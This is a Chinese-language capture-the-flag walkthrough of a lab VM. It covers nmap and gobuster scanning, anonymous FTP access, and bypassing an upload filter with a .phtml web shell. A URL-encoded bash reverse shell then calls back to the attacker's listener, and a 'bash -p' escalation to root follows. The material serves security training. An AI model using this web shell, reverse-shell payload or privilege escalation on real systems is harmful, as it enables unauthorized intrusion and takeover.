kali:192.168.56.104
靶机:192.168.56.124
端口扫描
nmap 192.168.56.124
# nmap 192.168.56.124
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-22 10:56 CST
Nmap scan report for 192.168.56.124
Host is up (0.000095s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:A0:30:58 (Oracle VirtualBox virtual NIC)
开启了21 22 80三个端口
ftp匿名登录
# ftp 192.168.56.124
Connected to 192.168.56.124.
220 (vsFTPd 3.0.5)
Name (192.168.56.124:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||48635|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 120 4096 Feb 01 20:18 .
drwxr-xr-x 2 0 120 4096 Feb 01 20:18 ..
-rw-rw-r-- 1 1000 1000 191 Feb 01 14:29 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||16642|)
150 Opening BINARY mode data connection for note.txt (191 bytes).
100% |************************************************************************************************| 191 31.52 KiB/s 00:00 ETA
226 Transfer complete.
191 bytes received in 00:00 (11.76 KiB/s)
ftp>
ftp> exit
221 Goodbye.┌──(root㉿kali2)-[~/Desktop]
└─# cat note.txt
Hi Matias, I have left on the web the continuations of today's work,
would you mind contiuing in your turn and make sure that the web will be secure?
提示没有什么用
目录扫描
─# gobuster dir -u http://192.168.56.124 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt ...
/css (Status: 301) [Size: 314] [--> http://192.168.56.124/css/]
/images (Status: 301) [Size: 317] [--> http://192.168.56.124/images/]
/index.html (Status: 200) [Size: 21487]
/index.html (Status: 200) [Size: 21487]
/js (Status: 301) [Size: 313] [--> http://192.168.56.124/js/]
/server-status (Status: 403) [Size: 279]
/upload.php (Status: 200) [Size: 371]
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.124/uploads/]
upload.php可以文件上传
测试发现不准上传php文件,但可以上传phtml文件
用phtml上传一个一句话马,然后弹个shell
http://192.168.56.124/uploads/shell2.phtml?0=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4567%20%200%3E%261%27
# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.124] 56044
bash: cannot set terminal process group (716): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1$ whoami
whoami
www-data
home目录下有个dev用户可以直接读取user flag
bash-5.1$ cd /home
cd /home
bash-5.1$ ls
ls
dev
bash-5.1$ cd dev
cd dev
bash-5.1$ ls -al
ls -al
total 40
drwxr-x--- 5 dev www-data 4096 Feb 11 00:10 .
drwxr-xr-x 3 root root 4096 Jan 31 21:44 ..
lrwxrwxrwx 1 root root 9 Feb 11 00:10 .bash_history -> /dev/null
-rw-r--r-- 1 dev dev 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 dev dev 3771 Jan 6 2022 .bashrc
drwx------ 2 dev dev 4096 Jan 31 21:48 .cache
-rw------- 1 dev dev 20 Feb 10 23:51 .lesshst
drwxrwxr-x 3 dev dev 4096 Feb 1 14:24 .local
-rw-r--r-- 1 dev dev 807 Jan 6 2022 .profile
drwx------ 2 dev dev 4096 Jan 31 21:45 .ssh
-rw-r--r-- 1 dev dev 0 Jan 31 21:51 .sudo_as_admin_successful
-rw-rw-r-- 1 dev dev 33 Feb 10 19:18 user.txt
bash-5.1$ cat user.ttx
cat user.ttx
cat: user.ttx: No such file or directory
bash-5.1$ cat user.txt
cat user.txt
71ab613fa286844425523780a7ebbab2
但是我在提权root时候遇到了问题,没有什么敏感文件,也没有定时任务,也没有suid提权,也没有什么root权限脚本...
然后回到这个bash上,一般bash都是www-data,为什么这次是bash-5
搜索一番知道home目录下.bash_profile .bashrc这两个文件被删了就会出现这种情况
但是修复也没有权限
然后尝试用bash -p就拿到了root权限
bash-5.1$ bash -p
bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
whoami
root